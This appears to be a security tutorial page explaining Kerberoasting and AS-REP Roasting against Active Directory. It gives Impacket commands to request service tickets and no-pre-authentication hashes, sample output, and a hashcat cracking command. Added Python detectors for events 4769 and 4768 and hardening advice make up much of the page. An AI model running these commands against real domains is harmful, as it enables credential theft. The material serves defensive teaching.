Kerberoasting
Kerberoasting is a common AD attack for obtaining AD tickets that helps with persistence. For this attack to work, an adversary must have access to Service Principal Name (SPN) accounts such as an IIS user, MSSQL, etc. The Kerberoasting attack involves requesting a Ticket Granting Ticket (TGT) and a Ticket Granting Service (TGS) ticket.
First, we need to find one or more SPN accounts, and then we can send a request to get a TGS ticket. We can perform the Kerberoasting attack from our machine using the Impacket GetUserSPNs.py Python script.
Once we find the SPN user, we can send a single request to get a TGS ticket.
- GetUserSPNs
# Find the user (GetUserSPNs.py authenticates as a domain user, given as domain/user:password)
GetUserSPNs.py -dc-ip <IP> <Domain>/<User>:<Password>
# Request the TGS ticket for the SPN account found above
GetUserSPNs.py -dc-ip <IP> <Domain>/<User>:<Password> -request-user <Username>
- Output
ServicePrincipalName    Name       MemberOf  PasswordLastSet             LastLogon  Delegation
----------------------  ---------  --------  --------------------------  ---------  ----------
http/PC-GREEN.DC.GREEN  svc-adobe            2022-06-10 05:47:33.796826
[-] CCache File is not Found. Skipping...
$krb5tgs$23$*svc-adobe$DC.GREEN$DC.green/svc-adobe*$[...]$[...]
We can crack the obtained TGS ticket using hashcat.
hashcat -a 0 -m 13100 <HASH> <Wordlist>
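From the defender's side, every TGS request above lands in the domain controller's Security log as event 4769, and the `$krb5tgs$23$` prefix in the output shows why the ticket is crackable: etype 23 is RC4-HMAC, whose key is the account's NT hash (that is what hashcat mode 13100 attacks). The following is an added example, not part of the page or of Impacket, that runs the two usual detections over 4769 records: any RC4 ticket issued for a user service account, and one requester pulling RC4 tickets for several distinct service accounts within a short window (the bulk `-request` pattern). Event records are assumed to be dicts with the 4769 field names; the sample events are constructed.

```python
"""Spot Kerberoasting in Windows Security event 4769 (TGS request) records.

Added example for this page, not Impacket code. Assumed input: each event is a
dict carrying the 4769 fields (TargetUserName = the account whose TGT made the
request, ServiceName = the SPN account, TicketEncryptionType as the hex string
the event XML uses). The sample events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# etype 23 (RC4-HMAC): the ticket is encrypted with the account's NT hash, which
# is why $krb5tgs$23$ tickets crack quickly in hashcat mode 13100. AES tickets
# (0x11 / 0x12) are not practical to crack offline.
RC4_HMAC = "0x17"


def is_roastable_request(event):
    """True for a 4769 that asks for an RC4 ticket to a user service account.
    Computer accounts (name ends in $) and krbtgt are skipped: their keys are
    long and random, so a ticket for them gives nothing worth cracking."""
    if event["EventID"] != 4769:
        return False
    svc = event["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return event["TicketEncryptionType"].lower() == RC4_HMAC


def rc4_requests(events):
    """Every individual roastable request, so the single targeted request the
    page describes is not lost behind a volume threshold."""
    return [(e["TargetUserName"], e["ServiceName"]) for e in events
            if is_roastable_request(e)]


def find_kerberoasting(events, window=timedelta(minutes=5), min_spns=3):
    """Flag requesters that pulled RC4 tickets for min_spns or more distinct
    service accounts inside one sliding window (bulk GetUserSPNs -request).
    Returns {requester: sorted SPN account names}."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_user[ev["TargetUserName"]].append(ev)
    alerts = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        start = 0
        for end in range(len(evs)):
            # advance the window start until evs[start..end] fit inside `window`
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            spns = {e["ServiceName"] for e in evs[start:end + 1]}
            if len(spns) >= min_spns:
                alerts[user] = sorted(spns)
    return alerts


def _ev(minute, user, svc, etype, ip="10.0.0.25"):
    """Build one constructed 4769 record."""
    return {"EventID": 4769, "TimeCreated": datetime(2022, 6, 10, 6, minute),
            "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "IpAddress": ip}


# Constructed sample log: one normal AES ticket, one requester hitting three
# service accounts with RC4 in three minutes, and two requests that must be skipped.
SAMPLE_EVENTS = [
    _ev(0, "alice@DC.GREEN", "PC-GREEN$", "0x12", "10.0.0.12"),
    _ev(1, "bob@DC.GREEN", "svc-adobe", "0x17"),
    _ev(2, "bob@DC.GREEN", "svc-sql", "0x17"),
    _ev(3, "bob@DC.GREEN", "svc-iis", "0x17"),
    _ev(4, "carol@DC.GREEN", "svc-sql", "0x12", "10.0.0.31"),
    _ev(5, "alice@DC.GREEN", "krbtgt", "0x17", "10.0.0.12"),
]

if __name__ == "__main__":
    for user, spns in find_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(spns)}")
```

The RC4 check is the important one: once service accounts have AES keys and the KDC no longer issues RC4 tickets for them (msDS-SupportedEncryptionTypes set to AES only), the hash the page shows cannot be requested in crackable form, and any remaining 0x17 ticket request is itself a strong signal. Long random passwords or group Managed Service Accounts remove the weak-password precondition the hashcat step depends on.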
AS-REP Roasting
AS-REP Roasting is the technique that enables the attacker to retrieve password hashes for AD users whose account options have been set to "Do not require Kerberos pre-authentication".
This option relies on the old Kerberos authentication protocol, which allows authentication without a password. Once we obtain the hashes, we can try to crack them offline. Before performing AS-REP Roasting, we need a list of domain accounts, which should be gathered during enumeration.
- GetNPUsers
# -format takes hashcat or john; with -usersfile no credentials are needed, so the target is just the domain
GetNPUsers.py -format hashcat -dc-ip <IP> <Domain>/ -usersfile <File with Domain Account Names>
- Output
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$victim@PC.GREEN:bca0eed41e12ab01f57de41d87ed356b$[...]
[-] User PC-GREEN$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[...]
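The `UF_DONT_REQUIRE_PREAUTH` flag that GetNPUsers.py reports is a single bit (0x400000) in each account's userAccountControl attribute, so the exposure can be audited directly from the directory rather than discovered by the attacker first; and because a TGT issued without pre-authentication is logged by the domain controller as event 4768 with Pre-Authentication Type 0, the collection itself is visible. The following added example (not from the page or from Impacket) does both over constructed data: it lists enabled accounts with the bit set and pulls the no-pre-auth AS-REQs out of a batch of 4768 records. Account records and events are assumed to be dicts with the LDAP attribute names and the 4768 field names respectively.

```python
"""Audit for AS-REP roasting exposure and spot the requests in event 4768.

Added example for this page, not Impacket code. Assumed input: account records
as dicts with sAMAccountName and userAccountControl (as an LDAP query returns
them) and 4768 (AS-REQ) events as dicts with the fields the Security log
exposes. All sample data below is constructed.
"""

# userAccountControl bits (values from MS-ADTS)
UF_ACCOUNTDISABLE = 0x2
UF_DONT_REQUIRE_PREAUTH = 0x400000   # the "Do not require Kerberos preauthentication" checkbox


def preauth_disabled_accounts(accounts):
    """Enabled accounts with UF_DONT_REQUIRE_PREAUTH set: the ones GetNPUsers.py
    would return a $krb5asrep$ hash for. Disabled accounts are skipped because
    the KDC refuses them (KDC_ERR_CLIENT_REVOKED) before any AS-REP is built."""
    return sorted(a["sAMAccountName"] for a in accounts
                  if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH
                  and not a["userAccountControl"] & UF_ACCOUNTDISABLE)


def asrep_roast_events(events):
    """A successful 4768 whose PreAuthType is "0" ("logon without
    pre-authentication") is a TGT handed out with no proof of the password,
    which is exactly what GetNPUsers.py collects. Returns (user, source IP)."""
    return [(ev["TargetUserName"], ev["IpAddress"]) for ev in events
            if ev["EventID"] == 4768
            and ev["PreAuthType"] == "0"
            and ev["Status"] == "0x0"]


# Constructed directory snapshot mirroring the page's output.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    {"sAMAccountName": "victim",        "userAccountControl": 0x410200},  # same, plus DONT_REQUIRE_PREAUTH
    {"sAMAccountName": "old-svc",       "userAccountControl": 0x410202},  # pre-auth off, but account disabled
    {"sAMAccountName": "PC-GREEN$",     "userAccountControl": 0x1000},    # WORKSTATION_TRUST_ACCOUNT
]

# Constructed 4768/4771 records; PreAuthType 2 is PA-ENC-TIMESTAMP (normal logon).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "Administrator", "PreAuthType": "2",
     "Status": "0x0", "IpAddress": "10.0.0.12"},   # ordinary interactive logon
    {"EventID": 4768, "TargetUserName": "victim", "PreAuthType": "0",
     "Status": "0x0", "IpAddress": "10.0.0.25"},   # TGT issued with no pre-auth: roastable AS-REP
    {"EventID": 4768, "TargetUserName": "Administrator", "PreAuthType": "-",
     "Status": "0x19", "IpAddress": "10.0.0.25"},  # KDC_ERR_PREAUTH_REQUIRED: the tool's "[-]" line
    {"EventID": 4771, "TargetUserName": "bob", "PreAuthType": "2",
     "Status": "0x18", "IpAddress": "10.0.0.12"},  # pre-auth failed (wrong password), different event
]

if __name__ == "__main__":
    print("accounts exposed to AS-REP roasting:", preauth_disabled_accounts(SAMPLE_ACCOUNTS))
    for user, ip in asrep_roast_events(SAMPLE_EVENTS):
        print(f"AS-REP without pre-auth for {user} from {ip}")
```

The fix is to clear the bit on every account the audit lists (the checkbox exists for legacy clients that cannot do pre-authentication, which is rare today); where one must stay, a long random password keeps the offline crack out of reach, and the 0x19 failures from the same source address in quick succession show the enumeration against accounts that were not exposed.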